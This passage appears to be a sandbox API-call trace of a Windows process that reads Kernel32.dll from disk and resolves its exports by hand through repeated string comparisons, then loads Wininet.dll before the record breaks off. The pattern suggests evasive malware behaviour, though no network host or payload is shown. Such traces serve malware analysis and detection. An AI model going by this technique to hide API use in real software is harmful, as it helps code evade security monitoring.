LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0185.764] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0185.765] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0185.765] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0185.765] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0185.765] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0185.766] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0185.766] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0185.766] GetProcessHeap () returned 0x4a0000 [0185.766] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xac430) returned 0x4cc5f0 [0185.769] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0185.772] ReadFile (in: hFile=0x134, lpBuffer=0x4cc5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4cc5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0185.789] CloseHandle (hObject=0x134) returned 1 [0185.789] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0185.798] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0185.798] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0185.798] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0185.798] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0185.798] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0185.799] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0185.799] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0185.799] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0185.799] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0185.799] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0185.799] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0185.799] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0185.799] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0185.799] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0185.800] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0185.800] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0185.800] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0185.800] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0185.800] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.801] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0185.802] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0185.803] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0185.803] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0185.804] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0185.805] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.805] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0185.806] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0185.806] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0185.806] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0185.806] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0185.806] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0185.806] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0185.807] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0185.807] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0185.807] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0185.807] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0185.808] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0185.809] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0185.809] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0185.810] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0185.811] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0185.812] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0185.812] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0187.689] GetProcessHeap () returned 0x4a0000 [0187.689] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cc5f0 | out: hHeap=0x4a0000) returned 1 [0187.690] GetProcessHeap () returned 0x4a0000 [0187.690] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9380 [0187.690] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0187.707] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0187.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0187.708] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0187.709] CreateFileA 